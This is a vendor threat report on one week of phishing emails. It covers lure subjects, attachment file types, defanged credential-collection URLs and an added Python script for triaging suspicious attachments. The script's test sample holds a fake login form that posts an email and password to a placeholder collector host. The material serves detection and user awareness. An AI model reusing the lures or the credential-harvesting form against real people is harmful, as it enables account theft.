ASEC Weekly Phishing Email Threat Trends (March 5th, 2023 – March 11th, 2023)

AhnLab Security Emergency response Center (ASEC) monitors phishing email threats with the ASEC automatic sample analysis system (RAPIT) and honeypot. This post will cover the cases of distribution of phishing emails during the week from March 5th, 2023 to March 11th, 2023 and provide statistical information on each type. Generally, phishing is cited as an attack that leaks users’ login account credentials by disguising as or impersonating an institute, company, or individual through social engineering methods. On a broader note, the act is a technical subterfuge that enables the threat actor to perform attacks such as information leaks, malware distribution, and fraud against various targets. The focus of this post will be on the fact that phishing attacks mainly occur through emails. We will also provide a detailed classification of various attack methods that are based on phishing emails. Furthermore, we will make an effort to minimize user damage by introducing new attack types that have never been found before and emails that require users’ caution, along with their keywords. The phishing emails covered in this post will only be those that have attachments. Emails that have malicious links in the body without attachments will be excluded.

Phishing Emails

During this week, the most prevalent threat type seen in phishing email attachments was FakePage with 84%. FakePages are web pages where the threat actor has imitated the screen layout, logo, and font of real login pages or advertising pages, leading users to enter their account and password information. The input information is sent to the threat actor’s C2 server or used to induce users to access other fake websites (see <FakePage C2 URL> below). It was then followed by Trojan (7%) and Infostealers (5%) such as AgentTesla and FormBook, which leak user credentials saved in web browsers, email clients, and FTP clients. The .NET packer makes up most of the Trojan category; it was introduced in the previous blog post ‘Types of Recent .NET Packers and Their Distribution Trends in Korea’ as Type 3 ‘VariantCrypter’. Aside from those mentioned above, Worm (2%), Exploit (2%), and Downloader (1%) types were detected. The threat types using phishing email attachments and their order of prevalence are similar to the order of malware distribution published weekly in the <ASEC Weekly Malware Statistics>.

File Extensions in Phishing Emails

We have identified which file extensions were used by the threats above for the distribution of email attachments. FakePages were distributed as web page script documents (HTML, HTM, SHTML) that must be opened with a web browser. Other malware, including Infostealers and Downloaders, came attached to emails with various file extensions, including compressed files (ZIP, R09, RAR), IMG disk image files, and PDF document files.

Cases of Distribution

The following are distribution cases that occurred during the week from March 5th, 2023 to March 11th, 2023. The cases will be classified into fake login pages and malware types, including Infostealer, Downloader, Exploit, and Backdoor. The numbers in email subjects and attachment filenames are unique IDs and may vary depending on the email recipient. Distribution cases with Korean subjects were also found. These are cases that specifically targeted Korean users instead of propagating themselves globally using the identical English subject and text.

Case: FakePage

| Email Subject | Attachment |
|---|---|
| DHL \| Global \| express | Transport_Doc_198290018.html |
| Re: PO 1015_INV (Invoice Request) | Invoice Request PO 1015_INV.htm |
| New DHL Shipment Document Arrival Notice / Shipping Documents / Original BL, Invoice & Packing List | (DHL) Original BL, PL, CI Copies.shtml |
| FedEx Service Alerts | FedEx_**lee-Original_Document.htm |
| Quotation Request | PO 230310-21A.htm |
| Re: PO 10960 | PO10960 .htm |
| Payment sent On: Wednesday, March 8, 2023 4:17 a.m. | Payment copy.pdf.html |
| New DHL Shipment Document Notice of Arrival / Shipping Documents / Original BL, Invoice & Packing List | (DHL) Original BL, PL, CI Copies.htm |
| Fw: PO 107556 (Invoice Request) | PO 107556Purchase Order .htm |
| You have received an essential encrypted company email – Remote | |
| URGENT !!! | Upgrade.html |
| New Order/PO # PUR120449-1 | Order_Inv PO # PUR120449-10.htm |
| Newly posted invoice , PL and BL | Invoice.AWB#84248_pdf.htm |
| countec-sales2 You Have a delievery | copy.AWB #0675854897.htm |
| FW:Payment Confirmation for Open Invoices INV-019358 sent via one-drive | Paid_invoice.html |
| Alerta ScotiaWeb: Comprobante Transaccion exitosa en Scotiabank ANGEL REYES MACARIO (868579) | Comprobante-2023-02-28T151137.308.pdf |
| New Contract N0_938 : PURCHASE ORDER ATTACHED | POrder2023.pdf |
| INQUIRY QT-0023817552 | QT_0023817552.html |
| ✈[DHL] Notice on Import Tax Payment Deadline – (INV and AWB) | DHLParcelShipment.html |
| Quotation QUO91019 | Quote.html |
| PO 197496 ( Invoice Request ) | PO_INV 197496 .htm |
| Payment Advice – Advice Ref:[922853603] | payment.html |
| Payment Swift and Invoice | Payment swift and invoice_ copy.shtml |
| New_fax_received_for_wong truefriend | Fax #2046.htm.htm |
| Re: URGENT / Request for Quotation | order specification.shtml |
| FedEx Service Alert. | FedEx_Original_Document.htm |
| DHL Shipping Notification: Please kindly see shipping invoices for payment with delivery | Packing List.htm |
| Re: NEW PO – NH1200/1500 | scanPO.htm |
| PO 10120H5 (Invoice Request) | PO 10120H5 Purchase Order .htm |
| RE: PFI PO 4899 | scan001.htm |
| Re: PO 1015 (Invoice Request) | Purchase Order PO 1015.htm |
| Invoice – INV-00546 | INV-00546.shtml |
| You have received a direct deposit alert! | 83739832283382923893HHDJHSD83387HDSSDSH.xhtml |
| Your parcel has arrived urgent pick up needed today. | parceldelivery.html |
| Your parcel has arrived urgent pick up needed today. | AWB #8347630147.htm |
| Request for Quotation of : Ammunition Vehicle and Howitzer with Standard Tools and Accessories | Ammunition Vehicle and Howitzer.html |
| New Order POH12-FA2306133 | PO H12-FA2306133.html |
| Quotation Request_**테크_20230223 | [G0170-PF3F-23-0223].html |
| Fwd: Fw: Fw: inquiry | New—inquiry.html |
| Request for quotation | New Order.html |
| Payment Confirmation. | USD 63,530.50.pdf |

Case: Malware (Infostealer, Downloader, etc.)

| Email Subject | Attachment |
|---|---|
| Re: Re: RE: anniversary | KYC_HN70(Feb15).one |
| Re[4]: sexy pics | greatimg.gif.scr |
| RE: New Order OZM PO#10391, PO#10392-6 | New Order OZM PO#10391, PO#10392-6.rar |
| RFQ – Automotive Industry – 5 special drawing Item – SOP: 2023-2030 – | RFQ – Automotive Industry.arj |
| Statement 000116057 TORKY SUPPLIES OFFICE | Statement 000116057 TORKY SUPPLIES OFFICE |
| cool photo imortant | privatephotos.scr |
| saipan star/CTM USD50000 | USD50000.docx |
| Wire transfer receiot | Receipt.doc |
| RE : PO FOR NEW ORDER ##2029 AND #5811 | order_2023.pdf.GZ |
| Re[5]: super smart photo very important | wild__images.pif |
| RFQ _Draft 08/03/ | |
| Re: Inquiry | Quote_3500001233.img |
| AW: PO-000001306 | PO-000001306.r09 |
| New Order | NEW |
| PO NO.PO03238012, | PO NO.PO03238012,.rar |
| Order-Dated 03-01-2023 | Enquiry2314.xls |
| DHL Notification | DHL Notification_pdf.rar |
| 50% Remittance Advise | Remittance_Advise.xls |
| Re: RFQ # GC-20230203 | RFQ # GC-20230203L.r09 |
| Revised Ghani Value Glass new order – SG Industries 100/24150 | ###PI WIith Size is 6×5.xls |
| Fwd: Payment Release (GBS LOGISTICS) | UPDATED SOA [REF CF005451] 2223.xls |
| RE: Reminder For Due Payment | Payment Advice 232-52126620A.xls |
| Quotation is Requested | petronas 1.rar |
| Informe de pago | pago de la ..factura 11-369013.PDF.img |
| Ref:103XXXXX Shipment of Original Documents. | DHL SHIPMENT NOTIFICATION.r09 |
| super wonderful photos just for you | sex_action.jpg.scr |
| Your DHL Parcel Has | |
| Supply of 3DC Project Marterials | 3DC Project Marterials.rar |
| Re[4]: super beautiful photo | bestscene.exe |
| FW: documentos solicitados | Documentos66548864.pdf.img |
| Eccentric Plug valve Technical DataSheet | Technical DataSheet.pdf.iso |
| beautiful picture | thepctrs.exe |
| smart pictures | thephotos.gif.scr |

The ASEC analysis team has selected keywords that users must look out for, based on the distribution cases above. If these keywords are included in the subject of the email, or if the same characteristics are found, users must exercise strict caution as they may be phishing emails from threat actors. 

Keywords to Beware of: ‘PO (Purchase Order)’

The keywords of this week are ‘PO (Purchase Order)’. Generally, when doing business with overseas companies, purchase orders (PO) listing the items purchased are sent, and each purchase order is assigned a number for business management. The threat actor impersonated a vendor and sent a fake PO number along with a FakePage (HTML) file as an attachment. The file was disguised as a login page for viewing a PDF, and the email asked for the user’s account credentials. The phishing page asks for the user’s ID and password over a blurred background image of what appears to be an order; users are advised not to enter their ID and password, as the information is sent to the threat actor’s server.

  • Threat actor’s server: hxxps[:]//experiaevents[.]in/italianpay/next.php

Phishing emails using the above server have been distributed to many users, and there have been more than 200 cases of access history to the server during the period from March 8th to March 17th. Although it isn’t certain whether the users’ credentials have been extorted, we assume that the majority of the recipients of the emails have opened the attachment.

FakePage C2 URL

When users enter their IDs and passwords on the login pages among the FakePages created by the threat actor, their information is sent to the attacker’s server. The list below shows the threat actor’s C2 addresses of fake login pages distributed during the week.

  • hxxps[:]//experiaevents[.]in/italianpay/next.php
  • hxxps[:]//formspree[.]io/f/xdovzjlo
  • hxxps[:]//submit-form[.]com/OIIpXOTl
  • hxxps[:]//daca[.]hostedwebsitesystem[.]com/vendor/phpunit/phpunit/src/Util/Log/index/index/spam/FedExpress[.]php
  • hxxps[:]//formspree[.]io/f/mjvdynwp
  • hxxps[:]//formspree[.]io/f/xwkjbjgo
  • hxxps[:]//formspree[.]io/f/myyakjqr
  • hxxp[:]//martinamilligan[.]co[.]business/ono/fdx[.]php
  • hxxps[:]//clinicacarlosgomes[.]med[.]br/wp-admin/kal/fte
  • hxxps[:]//formspree[.]io/f/mzbqgqyp
  • hxxps[:]//mallarg[.]tk/lp/fte[.]php
  • hxxps[:]//seafordrotary[.]org[.]au/Eppdff[.]php
  • hxxps[:]//k2-server[.]duckdns[.]org/roundbuk/pdf[.]php
  • hxxps[:]//cupertinochiropracticcenter[.]com/index/FedExpress[.]php
  • hxxps[:]//zenkoren[.]itigo[.]jp//cgi-bin/123/cloudlog[.]php
  • hxxps[:]//huntingfieldlodge[.]com[.]au/Aa/Excel22[.]php
  • hxxps[:]//formspree[.]io/f/mnqyznyy
  • hxxps[:]//mgffomento[.]com[.]br/wp-admin/dd/postdhll[.]php
  • hxxps[:]//holisticfacades[.]com[.]ng/wp-includes/aa/feed[.]php
  • hxxps[:]//dissertational-spee[.]000webhostapp[.]com/wp-admin/purchase/pdf[.]php
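The characteristics this post describes can be turned into a simple attachment triage check: web-page attachments (HTML/HTM/SHTML) carrying a credential form that posts to an external server, double extensions such as ‘Payment copy.pdf.html’, compressed-file and disk-image attachments used to get past attachment scans, and the ‘PO’ subject keyword. The Python script below is an added example written for this page; it is not ASEC’s RAPIT tooling or code from the report. The sample message, its two attachments, and the host collector.example.invalid are constructed for the example, and the extension lists extend the report’s with a few common neighbours (ZIP, 7Z, EXE).

```python
"""Added example: triage an email's attachments against the FakePage indicators
described in the ASEC weekly report. Sample data and hosts are constructed."""
import re
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Extension families from the report's "File Extensions" section, plus a few neighbours.
WEB_PAGE = {"html", "htm", "shtml", "xhtml"}
ARCHIVE = {"zip", "rar", "r09", "arj", "gz", "7z"}
DISK_IMAGE = {"img", "iso"}
EXECUTABLE = {"exe", "scr", "pif"}
DOCUMENT = {"pdf", "doc", "docx", "xls", "xlsx", "one"}
# Decoy extensions placed in front of the real one, e.g. "greatimg.gif.scr".
DECOY = {"pdf", "doc", "docx", "xls", "jpg", "jpeg", "gif", "png", "txt"}
# This week's keyword from the report.
SUBJECT_KEYWORDS = re.compile(r"\b(PO|Purchase\s+Order)\b", re.IGNORECASE)


class FormExtractor(HTMLParser):
    """Collects <form action=...> targets and notes whether a password input exists."""

    def __init__(self):
        super().__init__()
        self.actions = []
        self.has_password = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form" and a.get("action"):
            self.actions.append(a["action"].strip())
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True


def classify_filename(name):
    """Return (family, is_double_extension) for an attachment filename."""
    tokens = name.lower().split(".")
    ext = tokens[-1] if len(tokens) > 1 else ""
    if ext in WEB_PAGE:
        family = "web page"
    elif ext in ARCHIVE:
        family = "compressed file"
    elif ext in DISK_IMAGE:
        family = "disk image"
    elif ext in EXECUTABLE:
        family = "executable"
    elif ext in DOCUMENT:
        family = "document"
    else:
        family = "other"
    # "x.pdf.html": a harmless-looking decoy extension in front of a risky real one.
    double = len(tokens) >= 3 and tokens[-2] in DECOY and family not in ("document", "other")
    return family, double


def triage_message(raw_bytes):
    """Parse a raw RFC 5322 message and report the indicators discussed in the post."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_bytes)
    subject = str(msg["subject"] or "")
    report = {"subject": subject,
              "subject_keyword": bool(SUBJECT_KEYWORDS.search(subject)),
              "attachments": []}
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        family, double = classify_filename(name)
        entry = {"filename": name, "family": family, "double_extension": double,
                 "form_targets": [], "password_field": False, "reasons": []}
        if double:
            entry["reasons"].append("double extension")
        if family in ("compressed file", "disk image", "executable"):
            entry["reasons"].append(f"{family} attachment")
        if family == "web page":
            content = part.get_content()
            if isinstance(content, bytes):
                content = content.decode("utf-8", "replace")
            ex = FormExtractor()
            ex.feed(content)
            # Absolute form targets are where a FakePage sends whatever the user types.
            entry["form_targets"] = [u for u in ex.actions if urlsplit(u).netloc]
            entry["password_field"] = ex.has_password
            if entry["form_targets"] and ex.has_password:
                entry["reasons"].append("credential form posting to external host")
        report["attachments"].append(entry)
    return report


def build_sample_eml():
    """Constructed sample modelled on the PO-themed FakePage case; all hosts are fictitious."""
    msg = EmailMessage()
    msg["From"] = "sales@vendor.example"
    msg["To"] = "buyer@corp.example"
    msg["Subject"] = "Re: PO 1015_INV (Invoice Request)"
    msg.set_content("Please find the attached purchase order.")
    fake_page = (
        "<html><body><form action='https://collector.example.invalid/italianpay/next.php' "
        "method='post'><input name='email'><input type='password' name='pass'>"
        "<input type='submit' value='View PDF'></form></body></html>"
    )
    msg.add_attachment(fake_page, subtype="html", filename="Invoice Request PO 1015_INV.pdf.htm")
    msg.add_attachment(b"Rar!\x1a\x07\x00", maintype="application", subtype="octet-stream",
                       filename="DHL Notification_pdf.rar")
    return msg.as_bytes()


if __name__ == "__main__":
    result = triage_message(build_sample_eml())
    print("subject:", result["subject"], "| PO keyword:", result["subject_keyword"])
    for att in result["attachments"]:
        print(att["filename"], "->", att["family"], att["reasons"], att["form_targets"])
```

In practice the raw bytes would come from a mail gateway quarantine or a mailbox export rather than `build_sample_eml()`; the form target list is the part worth feeding into blocklists or comparing against the C2 addresses listed above, since it is extracted from the attachment itself rather than from the email body.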

Attacks using phishing emails are disguised with content that can easily deceive users, such as invoices and tax payments, to induce users to access fake login pages or execute malware. Fake login pages are evolving by the second to closely resemble the original pages. The attackers pack malware in compressed file formats to escape the attachment scans of users’ security products. Users must practice strict caution and refer to recent cases of distribution to avoid being exposed to infection by malicious phishing emails. The ASEC analysis team recommends users follow the email security guidelines below.

  • Do not open links or attachments in emails from unverified senders until they are proven to be credible.
  • Do not enter sensitive information such as login account credentials until the site is found to be reliable.
  • Do not execute attachments with unfamiliar file extensions until they are found to be reliable.
  • Use security products such as antimalware software.

According to the MITRE ATT&CK framework, phishing email attacks correspond to the following techniques.

  • Phishing for Information (Reconnaissance, ID: T1598[1])
  • Phishing (Initial Access, ID: T1566[2])
  • Internal Spearphishing (Lateral Movement, ID: T1534[3])

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.
